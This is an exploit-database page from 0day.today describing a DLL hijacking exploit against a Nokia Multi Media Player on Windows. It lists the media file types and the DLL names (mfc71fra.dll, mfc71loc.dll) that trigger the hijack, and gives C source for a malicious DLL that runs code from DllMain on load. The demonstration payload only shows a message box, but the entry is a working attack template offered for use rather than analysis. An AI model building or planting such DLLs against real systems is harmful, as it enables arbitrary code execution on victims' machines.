[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Multi Media Player Dll Hijacking Exploit

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14297
Category
local exploits
Date add
02-10-2010
Platform
windows
========================================
Multi Media Player Dll Hijacking Exploit
========================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

######################################################################## 

# Vendor: http://www.nokia.com

# Date: 2010-07-27 

# Author : indoushka 

# Thanks to : Dz-Ghost Team

# Contact : 00213771818860

# Tested on : windows SP2 Francais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 
-------------
exploited multimediaplayer.exe with exploit.3g2 using mfc71fra.dll
exploited multimediaplayer.exe with exploit.3g2 using mfc71loc.dll
exploited multimediaplayer.exe with exploit.3gp using mfc71fra.dll
exploited multimediaplayer.exe with exploit.3gp using mfc71loc.dll
exploited multimediaplayer.exe with exploit.amr using mfc71fra.dll
exploited multimediaplayer.exe with exploit.amr using mfc71loc.dll
exploited multimediaplayer.exe with exploit.awb using mfc71fra.dll
exploited multimediaplayer.exe with exploit.awb using mfc71loc.dll
exploited multimediaplayer.exe with exploit.evc using mfc71fra.dll
exploited multimediaplayer.exe with exploit.nim using mfc71fra.dll
exploited multimediaplayer.exe with exploit.nim using mfc71loc.dll
exploited multimediaplayer.exe with exploit.npl using mfc71fra.dll
exploited multimediaplayer.exe with exploit.npl using mfc71loc.dll
exploited multimediaplayer.exe with exploit.obm using mfc71fra.dll
exploited multimediaplayer.exe with exploit.obm using mfc71loc.dll
exploited multimediaplayer.exe with exploit.otb using mfc71fra.dll
exploited multimediaplayer.exe with exploit.otb using mfc71loc.dll
exploited multimediaplayer.exe with exploit.wbm using mfc71fra.dll
exploited multimediaplayer.exe with exploit.wbm using mfc71loc.dll
exploited multimediaplayer.exe with exploit.wbmp using mfc71fra.dll
exploited multimediaplayer.exe with exploit.wbmp using mfc71loc.dll
-------------
#include "stdafx.h"
#include "stdlib.h"
void init() {
MessageBox(NULL,"indoushka", "Hack3d",0x00000003);
}
 
 
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------



#  0day.today [2024-12-27]  #